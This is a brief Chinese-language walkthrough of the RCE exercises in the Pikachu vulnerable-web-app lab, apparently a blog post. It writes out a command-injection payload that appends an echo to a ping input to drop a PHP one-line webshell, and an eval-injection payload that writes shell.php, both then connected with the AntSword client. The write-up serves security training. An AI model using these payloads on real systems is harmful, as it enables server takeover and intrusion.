Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
小冯不疯12 小时前
轻松云数据集成平台:高效系统对接与智能运维
大数据·运维
炜宏资料库12 小时前
智慧能源设备运维管理系统如何建设?
运维·能源
古城小栈13 小时前
Docker 下配置 Pgsql 主从复制详细步骤指南
运维·docker·容器
xixixi7777713 小时前
从Mythos到GPT-5.4-Cyber:AI安全竞赛的“双轨”分化与防御新范式
网络·gpt·安全·机器学习·架构·大模型·claude
chao_66666613 小时前
AI coding 代码开发规范
linux·运维·服务器
APIshop13 小时前
Python 爬虫获取京东商品详情 API 接口实战指南
java·服务器·数据库
xiaobangsky13 小时前
Linux SMB/CIFS 网络挂载配置指南
linux·运维·网络
杰 .13 小时前
闲暇时刻对LinuxOS的部分理解(一)
linux·服务器
Cyber4K13 小时前
【Nginx专项】高级进阶架构篇-Location、Rewrite及HTTPS
服务器·nginx·架构·https
俺不要写代码13 小时前
线程启动、结束,创建线程多法、join,detach,线程的移动语义
服务器·开发语言·网络·c++